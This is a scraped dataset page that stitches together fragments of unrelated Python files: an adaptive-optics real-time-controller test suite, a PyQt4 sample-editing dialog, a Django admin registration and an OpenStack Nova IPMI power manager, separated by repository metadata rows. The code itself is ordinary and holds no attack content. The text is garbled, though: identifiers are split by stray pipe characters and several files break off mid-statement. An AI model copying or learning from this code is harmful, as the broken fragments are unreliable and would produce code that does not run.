# You should have received a copy of the GNU Lesser General Public License along with COMPASS.
# If not, see <https://www.gnu.org/licenses/lgpl-3.0.txt>.
import numpy as np
import naga as ng
import os
from shesha.sutra_wrap import Rtc_UFU as Rtc
from shesha.supervisor.compassSupervisor import CompassSupervisor as Supervisor
from scipy.ndimage.measurements import center_of_mass
from shesha.config import ParamConfig
precision = 1e-2
config = ParamConfig(os.getenv("COMPASS_ROOT") +
"/shesha/tests/pytest/par/test_sh.py")
config.p_dms[0].unitpervolt = 500
config.p_dms[0].push4imat = 0.5
config.p_dms[1].unitpervolt = 500
config.p_dms[1].push4imat = 0.5
sup = Supervisor(config)
sup.wfs._wfs.d_wfs[0].set_fakecam(True)
sup.wfs._wfs.d_wfs[0].set_max_flux_per_pix(int(sup.config.p_wfss[0]._nphotons // 2))
sup.wfs._wfs.d_wfs[0].set_max_pix_value(2**16 - 1)
sup.next()
sup.rtc.open_loop(0)
sup.rtc.close_loop(0)
sup.rtc.do_control(0)
rtc = Rtc()
rtc.add_centroider(sup.context, sup.config.p_wfss[0]._nvalid,
sup.config.p_wfss[0].npix / 2 - 0.5, sup.config.p_wfss[0].pixsize, False, 0,
"cog")
rtc.add_controller(sup.context, "generic", 0, sup.config.p_controllers[0].delay,
sup.config.p_wfss[0]._nvalid * 2, sup.config.p_controllers[0].nactu,
idx_centro=np.zeros(1),
ncentro=1)
centro = rtc.d_centro[0]
control = rtc.d_control[0]
rtc.d_centro[0].set_npix(sup.config.p_wfss[0].npix)
xvalid = np.array(sup.rtc._rtc.d_centro[0].d_validx)
yvalid = np.array(sup.rtc._rtc.d_centro[0].d_validy)
rtc.d_centro[0].load_validpos(xvalid, yvalid, xvalid.size)
cmat = sup.rtc.get_command_matrix(0)
rtc.d_control[0].set_cmat(cmat)
rtc.d_control[0].set_gain(sup.config.p_controllers[0].gain)
frame = np.array(sup.wfs._wfs.d_wfs[0].d_camimg)
rtc.d_centro[0].load_img(frame, frame.shape[0])
rtc.d_centro[0].calibrate_img()
rtc.do_centroids(0)
slp = ng.array(rtc.d_control[0].d_centroids)
rtc.do_control(0)
com = ng.array(rtc.d_control[0].d_com)
dark = np.random.random(frame.shape)
flat = np.random.random(frame.shape)
centro.set_dark(dark, frame.shape[0])
centro.set_flat(flat, frame.shape[0])
def relative_array_error(array1, array2):
return np.abs((array1 - array2) / array2.max()).max()
def test_initCentro_nvalid():
assert (centro.nvalid - sup.config.p_wfss[0]._nvalid < precision)
def test_initCentro_offset():
assert (centro.offset - (sup.config.p_wfss[0].npix / 2 - 0.5) < precision)
def test_initCentro_scale():
assert (centro.scale - sup.config.p_wfss[0].pixsize < precision)
def test_initCentro_type():
assert (centro.type == "cog")
def test_initControl_nslope():
assert (control.nslope - sup.config.p_wfss[0]._nvalid * 2 < precision)
def test_initControl_nactu():
assert (control.nactu - sup.config.p_controllers[0].nactu < precision)
def test_initControl_type():
assert (control.type == "generic")
def test_initControl_delay():
assert (control.delay - sup.config.p_controllers[0].delay < precision)
def test_set_npix():
assert (centro.npix - sup.config.p_wfss[0].npix < precision)
def test_load_validposX():
assert (relative_array_error(np.array(centro.d_validx), xvalid) < precision)
def test_load_validposY():
assert (relative_array_error(np.array(centro.d_validy), yvalid) < precision)
def test_set_cmat():
assert (relative_array_error(ng.array(control.d_cmat).toarray(), cmat) < precision)
def test_set_gain():
assert (control.gain - sup.config.p_controllers[0].gain < precision)
def test_load_img():
assert (relative_array_error(np.array(centro.d_img_raw), frame) < precision)
def test_set_dark():
assert (relative_array_error(ng.array(centro.d_dark).toarray(), dark) < precision)
def test_set_flat():
assert (relative_array_error(ng.array(centro.d_flat).toarray(), flat) < precision)
def test_calibrate_img():
centro.calibrate_img()
imgCal = (frame.astype(np.float32) - dark) * flat
assert (relative_array_error(ng.array(centro.d_img).toarray(), imgCal) < precision)
def test_doCentroids_cog():
bincube = np.array(sup.wfs._wfs.d_wfs[0].d_bincube)
slopes = np.zeros(sup.config.p_wfss[0]._nvalid * 2)
offset = centro.offset
scale = centro.scale
for k in range(sup.config.p_wfss[0]._nvalid):
tmp = center_of_mass(bincube[:, :, k])
slopes[k] = (tmp[0] - offset) * scale
slopes[k + sup.config.p_wfss[0]._nvalid] = (tmp[1] - offset) * scale
assert (relative_array_error(ng.array(control.d_centroids).toarray(), slopes) <
precision)
def test_do_control_generic():
slopes = ng.array(control.d_centroids).toarray()
gain = control.gain
cmat = ng.array(control.d_cmat).toarray()
commands = cmat.dot(slopes) * gain * (-1)
assert (relative_array_error(ng.array(control.d_com).toarray(), commands) <
precision)
def test_set_comRange():
control.set_comRange(-1, 1)
assert (control.comRange == (-1, 1))
def test_clipping():
control.set_comRange(-1, 1)
C = (np.random.random(sup.config.p_controllers[0].nactu) - 0.5) * 4
control.set_com(C, C.size)
rtc.do_clipping(0)
C_clipped = C.copy()
C_clipped[np.where(C > 1)] = 1
C_clipped[np.where(C < -1)] = -1
assert (relative_array_error(ng.array(control.d_com_clipped).toarray(), C_clipped) <
precision)
def test_add_perturb_voltage():
C = np.random.random(sup.config.p_controllers[0].nactu)
control.add_perturb_voltage("test", C, 1)
assert (relative_array_error(
ng.array(control.d_perturb_map["test"][0]).toarray(), C) < precision)
def test_remove_perturb_voltage():
control.remove_perturb_voltage("test")
assert (control.d_perturb_map == {})
def test_add_perturb():
C = np.random.random(sup.config.p_controllers[0].nactu)
control.add_perturb_voltage("test", C, 1)
com = ng.array(control.d_com_clipped).toarray()
control.add_perturb()
assert (relative_array_error(ng.array(control.d_com_clipped).toarray(), com + C) <
precision)
def test_disable_perturb_voltage():
control.disable_perturb_voltage("test")
com = ng.array(control.d_com).toarray()
control.add_perturb()
assert (relative_array_error(ng.array(control.d_com).toarray(), com) < precision)
def test_enable |
vince8290/dana | ui_files/samples.py | Python | gpl-3.0 | 11,728 | 0.004093 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'events.ui'
#
# Created by: PyQt4 UI code generator 4.11.4
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
from collections import *
from functools import *
import os, glob
import pandas as pd
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_SamplesDialog(QtGui.QDialog):
def __init__(self, parent=None, datafolder=None):
"""
Constructor
"""
QtGui.QDialog.__init__(self, parent)
# self.filelist = filelist
self.datafolder = datafolder
# labels font
self.font_labels = QtGui.QFont("Arial", 12, QtGui.QFont.Bold)
self.font_edits = QtGui.QFont("Arial", 12)
self.font_buttons = QtGui.QFont("Arial", 10, QtGui.QFont.Bold)
self.setupUi(self)
self.exec_()
def setupUi(self, Dialog):
Dialog.setObjectName(_fromUtf8("Dialog"))
Dialog.resize(1000, 400)
self.gridLayout = QtGui.QGridLayout(Dialog)
self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
# list of Events
self.prepare_form(Dialog)
self.retranslateUi(Dialog)
QtCore.QMetaObject.connectSlotsByName(Dialog)
def load_data(self):
print(self.datafolder)
self.samplefile = glob.glob(os.path.join(self.datafolder, "*_SAMPLES.csv"))[0]
if os.path.isfile(self.samplefile):
self.samplesdf = pd.read_csv(self.samplefile, encoding='ISO-8859-1')
else:
print("File not found: ", self.samplefile)
self.samplesdf = None
self.combodefaults = {'cuvette': ['600', '2000', '4000']}
def prepare_form(self, Dialog):
# load or reload data
self.load_data()
# form dicts
edit_list = ['date', 'time', 'samplename', 'filename', 'smoothing', 'cal32', 'cal44', 'cons32', 'cons44',
'zero44', 'zero45', 'zero46', 'zero47', 'zero49']
combo_list = ['user', 'membrane', 'cuvette']
self.labels = defaultdict(defaultdict)
self.edits = defaultdict(defaultdict)
self.radios = defaultdict(defaultdict)
self.combobox = defaultdict(defaultdict)
self.labs = defaultdict(defaultdict)
self.labs = {"time": "Time",
"date": "Date",
"samplename": "Sample Name",
"filename": "File Name",
"smoothing": "Smoothing",
"cuvette": "Cuvette",
"user": "User",
"membrane": "Membrane",
"cal44": "Calibration 44",
"cal32": "Calibration 32",
"cons32": "Consumption 32",
"cons44": "Consumption 44",
"zero32": "Zero 32",
"zero44": "Zero 44",
"zero45": "Zero 45",
"zero46": "Zero 46",
"zero47": "Zero 47",
"zero49": "Zero 49"}
self.buttons = OrderedDict(sorted({'Apply': defaultdict(object), 'Delete': defaultdict(object)}.items()))
xpos, ypos = 1, 0
for row in self.samplesdf.iterrows():
row_index = row[0]
r = row[1]
self.radios[row_index] = QtGui.QRadioButton(Dialog)
self.radios[row_index].setObjectName(_fromUtf8("_".join(["radio", str(row_index)])))
self.gridLayout.addWidget(self.radios[row_index], ypos+1, 0, 1, 1)
for k in ['samplename', 'date', 'time', 'cuvette']:
# create labels
if ypos == 0:
self.labels[k] = QtGui.QLabel(Dialog)
self.labels[k].setObjectName(_fromUtf8("_".join(["label", k])))
self.labels[k].setText(str(self.labs[k]))
self.labels[k].setAlignment(QtCore.Qt.AlignCenter | QtCore.Qt.AlignVCenter)
self.labels[k].setFont(self.font_labels)
self.gridLayout.addWidget(self.labels[k], 0, xpos, 1, 1)
if k in edit_list:
self.edits[k][row_index] = QtGui.QLineEdit(Dialog)
| self.edits[k][row_index].setObjectName(_fromUtf8("_".join(["edit", k, str(row_index)])))
self.edits[k][row_index].setText(str(r[k]))
self.edits[k][row_index].setFont(self.font_edits)
if k in ['time', 'date']:
self.edits[k][row_index].setF | ixedWidth(80)
self.gridLayout.addWidget(self.edits[k][row_index], ypos+1, xpos, 1, 1)
elif k in combo_list:
self.combobox[k][row_index] = QtGui.QComboBox(Dialog)
self.combobox[k][row_index].setObjectName(_fromUtf8("_".join(["combo", k, str(row_index)])))
self.combobox[k][row_index].addItems(self.combodefaults[k])
self.combobox[k][row_index].setCurrentIndex(self.combobox[k][row_index].findText(str(r[k]), QtCore.Qt.MatchFixedString))
self.combobox[k][row_index].setFont(self.font_edits)
self.gridLayout.addWidget(self.combobox[k][row_index], ypos+1, xpos, 1, 1)
xpos += 1
# create buttons
for k in self.buttons.keys():
# if ypos > 0:
self.buttons[k][row_index] = QtGui.QPushButton(Dialog)
self.buttons[k][row_index].setObjectName(_fromUtf8("_".join(["event", k, "button", str(row_index)])))
self.buttons[k][row_index].setText(_translate("Dialog", k + str(row_index), None))
self.buttons[k][row_index].setFont(self.font_buttons)
if k == 'Apply':
self.buttons[k][row_index].clicked.connect(partial(self.ask_apply_changes, [row_index, Dialog]))
self.buttons[k][row_index].setStyleSheet("background-color: #ffeedd")
elif k == 'Delete':
self.buttons[k][row_index].clicked.connect(partial(self.ask_delete_confirm1, [row_index, Dialog]))
self.buttons[k][row_index].setStyleSheet("background-color: #ffcddd")
self.gridLayout.addWidget(self.buttons[k][row_index], ypos+1, xpos, 1, 1)
xpos += 1
# increments
ypos += 1
xpos = 1
Dialog.resize(1000, 70 + (30 * ypos))
# self.add_row(Dialog)
def ask_delete_confirm1(self, args):
sid = args[0]
Dialog = args[1]
# check if radio button is checked.
if self.radios[sid].isChecked():
msg = "Are you sure you want to delete the following sample : \n\n"
details = ""
for c in self.samplesdf.columns:
details += str(c) + ": " + str(self.samplesdf.at[sid, c]) + "\n"
reply = QtGui.QMessageBox.warning(self, 'Confirmation #1',
msg + details, QtGui.QMessageBox.Yes, QtGui.QMessageBox.No)
if reply == QtGui.QMessageBox.Yes:
msg2 = "Are you sure REALLY REALLY sure you want to delete the following sample ? \n\n" + \
"This is the last confirmation message. After confirming, the files will be PERMANENTLY deleted and the data WILL be lost ! \n\n"
msgbox = QtGui.QMessageBox.critical(self, 'Confirmation #2',
msg2 + details, QtGui. |
1orwell/proghelp | proghelp/events/admin.py | Python | mit | 94 | 0.010638 | from django.contrib import admin
from events.mode | ls import Event
a | dmin.site.register(Event)
|
fajoy/nova | nova/virt/baremetal/ipmi.py | Python | apache-2.0 | 8,800 | 0.000568 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# coding=utf-8
# Copyright 2012 Hewlett-Packard Development Company, L.P.
# Copyright (c) 2012 NTT DOCOMO, INC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF | ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Baremetal IPMI power manager.
"""
import os
import stat
import tempfile
from nova.exception import Inval | idParameterValue
from nova.openstack.common import cfg
from nova.openstack.common import log as logging
from nova import paths
from nova import utils
from nova.virt.baremetal import baremetal_states
from nova.virt.baremetal import base
from nova.virt.baremetal import utils as bm_utils
opts = [
cfg.StrOpt('terminal',
default='shellinaboxd',
help='path to baremetal terminal program'),
cfg.StrOpt('terminal_cert_dir',
default=None,
help='path to baremetal terminal SSL cert(PEM)'),
cfg.StrOpt('terminal_pid_dir',
default=paths.state_path_def('baremetal/console'),
help='path to directory stores pidfiles of baremetal_terminal'),
cfg.IntOpt('ipmi_power_retry',
default=5,
help='maximal number of retries for IPMI operations'),
]
baremetal_group = cfg.OptGroup(name='baremetal',
title='Baremetal Options')
CONF = cfg.CONF
CONF.register_group(baremetal_group)
CONF.register_opts(opts, baremetal_group)
LOG = logging.getLogger(__name__)
def _make_password_file(password):
fd, path = tempfile.mkstemp()
os.fchmod(fd, stat.S_IRUSR | stat.S_IWUSR)
with os.fdopen(fd, "w") as f:
f.write(password)
return path
def _get_console_pid_path(node_id):
name = "%s.pid" % node_id
path = os.path.join(CONF.baremetal.terminal_pid_dir, name)
return path
def _get_console_pid(node_id):
pid_path = _get_console_pid_path(node_id)
if os.path.exists(pid_path):
with open(pid_path, 'r') as f:
pid_str = f.read()
try:
return int(pid_str)
except ValueError:
LOG.warn(_("pid file %s does not contain any pid"), pid_path)
return None
class IPMI(base.PowerManager):
"""IPMI Power Driver for Baremetal Nova Compute
This PowerManager class provides mechanism for controlling the power state
of physical hardware via IPMI calls. It also provides serial console access
where available.
"""
def __init__(self, node, **kwargs):
self.state = None
self.retries = None
self.node_id = node['id']
self.address = node['pm_address']
self.user = node['pm_user']
self.password = node['pm_password']
self.port = node['terminal_port']
if self.node_id == None:
raise InvalidParameterValue(_("Node id not supplied to IPMI"))
if self.address == None:
raise InvalidParameterValue(_("Address not supplied to IPMI"))
if self.user == None:
raise InvalidParameterValue(_("User not supplied to IPMI"))
if self.password == None:
raise InvalidParameterValue(_("Password not supplied to IPMI"))
def _exec_ipmitool(self, command):
args = ['ipmitool',
'-I',
'lanplus',
'-H',
self.address,
'-U',
self.user,
'-f']
pwfile = _make_password_file(self.password)
try:
args.append(pwfile)
args.extend(command.split(" "))
out, err = utils.execute(*args, attempts=3)
LOG.debug(_("ipmitool stdout: '%(out)s', stderr: '%(err)%s'"),
locals())
return out, err
finally:
bm_utils.unlink_without_raise(pwfile)
def _is_power(self, state):
out_err = self._exec_ipmitool("power status")
return out_err[0] == ("Chassis Power is %s\n" % state)
def _power_on(self):
"""Turn the power to this node ON"""
def _wait_for_power_on():
"""Called at an interval until the node's power is on"""
if self._is_power("on"):
self.state = baremetal_states.ACTIVE
raise utils.LoopingCallDone()
if self.retries > CONF.baremetal.ipmi_power_retry:
self.state = baremetal_states.ERROR
raise utils.LoopingCallDone()
try:
self.retries += 1
self._exec_ipmitool("power on")
except Exception:
LOG.exception(_("IPMI power on failed"))
self.retries = 0
timer = utils.FixedIntervalLoopingCall(_wait_for_power_on)
timer.start(interval=0.5).wait()
def _power_off(self):
"""Turn the power to this node OFF"""
def _wait_for_power_off():
"""Called at an interval until the node's power is off"""
if self._is_power("off"):
self.state = baremetal_states.DELETED
raise utils.LoopingCallDone()
if self.retries > CONF.baremetal.ipmi_power_retry:
self.state = baremetal_states.ERROR
raise utils.LoopingCallDone()
try:
self.retries += 1
self._exec_ipmitool("power off")
except Exception:
LOG.exception(_("IPMI power off failed"))
self.retries = 0
timer = utils.FixedIntervalLoopingCall(_wait_for_power_off)
timer.start(interval=0.5).wait()
def _set_pxe_for_next_boot(self):
try:
self._exec_ipmitool("chassis bootdev pxe")
except Exception:
LOG.exception(_("IPMI set next bootdev failed"))
def activate_node(self):
"""Turns the power to node ON"""
if self._is_power("on") and self.state == baremetal_states.ACTIVE:
LOG.warning(_("Activate node called, but node %s "
"is already active") % self.address)
self._set_pxe_for_next_boot()
self._power_on()
return self.state
def reboot_node(self):
"""Cycles the power to a node"""
self._power_off()
self._set_pxe_for_next_boot()
self._power_on()
return self.state
def deactivate_node(self):
"""Turns the power to node OFF, regardless of current state"""
self._power_off()
return self.state
def is_power_on(self):
return self._is_power("on")
def start_console(self):
if not self.port:
return
args = []
args.append(CONF.baremetal.terminal)
if CONF.baremetal.terminal_cert_dir:
args.append("-c")
args.append(CONF.baremetal.terminal_cert_dir)
else:
args.append("-t")
args.append("-p")
args.append(str(self.port))
args.append("--background=%s" % _get_console_pid_path(self.node_id))
args.append("-s")
try:
pwfile = _make_password_file(self.password)
ipmi_args = "/:%(uid)s:%(gid)s:HOME:ipmitool -H %(address)s" \
" -I lanplus -U %(user)s -f %(pwfile)s sol activate" \
% {'uid': os.getuid(),
'gid': os.getgid(),
'address': self.address,
'user': self.user,
'pwfile': pwfile,
}
args.append(ipmi_args)
# Run shellinaboxd without pipes. Otherwise utils.execute() waits
# infinitely since shellinaboxd does not close passed fds.
x = ["'" + arg.replace("'", "'\\''") + "'" f |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.